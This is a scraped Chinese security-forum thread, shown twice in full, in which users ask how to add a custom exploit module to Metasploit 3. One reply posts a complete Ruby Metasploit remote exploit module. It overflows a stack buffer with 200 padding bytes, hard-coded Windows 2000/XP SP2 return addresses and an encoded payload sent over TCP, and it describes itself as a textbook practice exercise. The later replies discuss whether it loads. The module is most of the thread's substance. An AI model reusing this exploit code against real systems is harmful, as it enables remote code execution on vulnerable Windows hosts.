[求助]MSF3.2 如何添加EXPLOIT啊-《0day:软件漏洞分析技术》-看雪-安全社区|安全招聘|kanxue.com

最新回复 (3)
黑色精灵雪币： 10 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 28 粉丝 0 关注私信	黑色精灵 2 楼 ## # $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' module Msf class Exploits::Yangshuo::POC < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'YANGSHUO_POC', 'Version' => '1.0', 'Platform' => 'win', 'Privileged' => true, 'License' => MSF_LICENSE, 'Author' => 'yangshuo', 'Targets' => [ ['Windows 2000', {'Ret' => [200 , 0x77e2307b] }], ['Windows XP SP2',{'Ret' => [200 , 0x7C914393] }], ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 200, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Description' => %q{ this module is exploit practice of book "Vulnerability Exploit and Analysis Technique" used only for educational purpose }, 'Arch' => 'x86', 'References' => [ [ 'URL', 'http://www.failwest.com' ], [ 'CVE', '44444' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' } )) end #end of initialize def exploit connect print_status("Sending #{payload.encoded.length} byte payload...") buf = 'a'*target['Ret'][0] buf << [target['Ret'][1]].pack('V') buf <<payload.encoded; sock.put(buf) handler disconnect end #end of exploit def end end 这是修改FAILWEST的代码所得的，你看看必须符合MF3的标准才可以上面那个ID，# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $ class Exploits::Yangshuo::POC 这个类名一定要大写要不报错！~~~~~ 你试试吧要不行你在发帖！总之一句话你的东西得符合 MF3的要求要不他是不可能是别的 2010-4-15 13:46 0
liuyuer 雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 51 粉丝 0 关注私信	liuyuer 3 楼我也遇到了，但是这个方法似乎没用，即使全都是大写也不行，我用的是3.3.4 2010-4-28 15:00 0
黑色精灵雪币： 10 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 28 粉丝 0 关注私信	黑色精灵 4 楼哥们那我怎么好使呢！~~~你把我的代码粘进去看看不行你再发贴！~~~ 2010-5-1 14:57 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (3)
黑色精灵雪币： 10 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 28 粉丝 0 关注私信	黑色精灵 2 楼 ## # $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' module Msf class Exploits::Yangshuo::POC < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'YANGSHUO_POC', 'Version' => '1.0', 'Platform' => 'win', 'Privileged' => true, 'License' => MSF_LICENSE, 'Author' => 'yangshuo', 'Targets' => [ ['Windows 2000', {'Ret' => [200 , 0x77e2307b] }], ['Windows XP SP2',{'Ret' => [200 , 0x7C914393] }], ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 200, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Description' => %q{ this module is exploit practice of book "Vulnerability Exploit and Analysis Technique" used only for educational purpose }, 'Arch' => 'x86', 'References' => [ [ 'URL', 'http://www.failwest.com' ], [ 'CVE', '44444' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' } )) end #end of initialize def exploit connect print_status("Sending #{payload.encoded.length} byte payload...") buf = 'a'*target['Ret'][0] buf << [target['Ret'][1]].pack('V') buf <<payload.encoded; sock.put(buf) handler disconnect end #end of exploit def end end 这是修改FAILWEST的代码所得的，你看看必须符合MF3的标准才可以上面那个ID，# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $ class Exploits::Yangshuo::POC 这个类名一定要大写要不报错！~~~~~ 你试试吧要不行你在发帖！总之一句话你的东西得符合 MF3的要求要不他是不可能是别的 2010-4-15 13:46 0
liuyuer 雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 51 粉丝 0 关注私信	liuyuer 3 楼我也遇到了，但是这个方法似乎没用，即使全都是大写也不行，我用的是3.3.4 2010-4-28 15:00 0
黑色精灵雪币： 10 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 28 粉丝 0 关注私信	黑色精灵 4 楼哥们那我怎么好使呢！~~~你把我的代码粘进去看看不行你再发贴！~~~ 2010-5-1 14:57 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复